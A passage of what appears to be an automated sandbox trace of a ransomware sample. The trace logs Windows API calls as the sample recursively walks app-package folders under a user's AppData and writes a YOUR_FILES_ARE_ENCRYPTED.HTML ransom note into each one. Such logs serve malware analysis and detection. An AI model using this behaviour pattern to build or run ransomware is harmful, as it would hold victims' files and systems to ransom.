2 [0120.052] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="E2") returned 2 [0120.052] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="B3") returned 2 [0120.052] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="97") returned 2 [0120.052] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="53") returned 2 [0120.052] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="57") returned 2 [0120.052] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="96") returned 2 [0120.052] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="7E") returned 2 [0120.052] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="63") returned 2 [0120.052] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="69") returned 2 [0120.052] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="91") returned 2 [0120.052] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="C9") returned 2 [0120.052] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="CD") returned 2 [0120.052] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="08") returned 2 [0120.052] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="22") returned 2 [0120.052] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="75") returned 2 [0120.053] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="B8") returned 2 [0120.053] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="68") returned 2 [0120.053] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="F8") returned 2 [0120.053] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="3C") returned 2 [0120.053] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="35") returned 2 [0120.053] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="2A") returned 2 [0120.053] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="BD") returned 2 [0120.053] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="60") returned 2 [0120.053] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings\\settings.dat" [0120.053] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0120.053] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0120.053] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x563f9f12, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x563f9f12, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="settings.dat", cAlternateFileName="")) returned 0 [0120.053] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.053] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 129 [0120.054] GetProcessHeap () returned 0x600000 [0120.054] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.054] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.054] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.056] CloseHandle (hObject=0x31c) returned 1 [0120.056] GetProcessHeap () returned 0x600000 [0120.056] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.056] GetProcessHeap () returned 0x600000 [0120.056] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.056] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563f9f12, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x563f9f12, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x563f9f12, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0120.056] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.056] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\SystemAppData") returned 104 [0120.056] GetProcessHeap () returned 0x600000 [0120.056] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.056] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\SystemAppData" [0120.056] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\SystemAppData\\*" [0120.056] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563f9f12, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x563f9f12, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x563f9f12, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.056] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563f9f12, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x563f9f12, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x563f9f12, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0120.056] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563f9f12, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x563f9f12, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x563f9f12, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0120.056] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.056] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 134 [0120.056] GetProcessHeap () returned 0x600000 [0120.056] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.057] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.057] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.058] CloseHandle (hObject=0x31c) returned 1 [0120.058] GetProcessHeap () returned 0x600000 [0120.058] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.058] GetProcessHeap () returned 0x600000 [0120.058] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.059] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563d3cec, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x563d3cec, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x563d3cec, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0120.059] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.059] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\TempState") returned 100 [0120.059] GetProcessHeap () returned 0x600000 [0120.059] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.059] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\TempState" [0120.059] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\TempState\\*" [0120.059] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563d3cec, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x563d3cec, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x563d3cec, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626978 [0120.059] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563d3cec, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x563d3cec, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x563d3cec, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0120.059] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563d3cec, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x563d3cec, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x563d3cec, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0120.059] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0120.059] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 130 [0120.059] GetProcessHeap () returned 0x600000 [0120.059] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.059] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.060] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.061] CloseHandle (hObject=0x31c) returned 1 [0120.061] GetProcessHeap () returned 0x600000 [0120.061] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.061] GetProcessHeap () returned 0x600000 [0120.061] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.061] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563d3cec, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x563d3cec, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x563d3cec, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0120.061] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0120.061] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 120 [0120.061] GetProcessHeap () returned 0x600000 [0120.061] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3106fd8 [0120.061] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0120.062] WriteFile (in: hFile=0x214, lpBuffer=0x3106fd8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3106fd8*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0120.063] CloseHandle (hObject=0x214) returned 1 [0120.063] GetProcessHeap () returned 0x600000 [0120.063] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.063] GetProcessHeap () returned 0x600000 [0120.063] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0120.064] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1aff73be, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b0b5e90, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b364b39, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.WindowsCamera_8wekyb3d8bbwe", cAlternateFileName="MI97A6~1.WIN")) returned 1 [0120.064] StrStrIW (lpFirst="Microsoft.WindowsCamera_8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.064] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe") returned 86 [0120.064] GetProcessHeap () returned 0x600000 [0120.064] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0120.065] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe" [0120.065] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\*" [0120.065] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1aff73be, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b0b5e90, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b364b39, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0120.068] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1aff73be, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b0b5e90, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b364b39, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0120.068] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1b0b5e90, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b0b5e90, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b0dc0dd, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0120.068] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.068] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC") returned 89 [0120.068] GetProcessHeap () returned 0x600000 [0120.068] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.069] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC" [0120.069] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\*" [0120.069] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1b0b5e90, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b0b5e90, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b0dc0dd, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dad86, dwReserved1=0x6dacd8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.075] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1b0b5e90, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b0b5e90, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b0dc0dd, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dad86, dwReserved1=0x6dacd8, cFileName="..", cAlternateFileName="")) returned 1 [0120.075] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1b0dc0dd, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b0dc0dd, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b0dc0dd, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dad86, dwReserved1=0x6dacd8, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0120.075] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.075] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCache") returned 99 [0120.075] GetProcessHeap () returned 0x600000 [0120.075] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.077] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCache" [0120.077] lstrcatW (in: 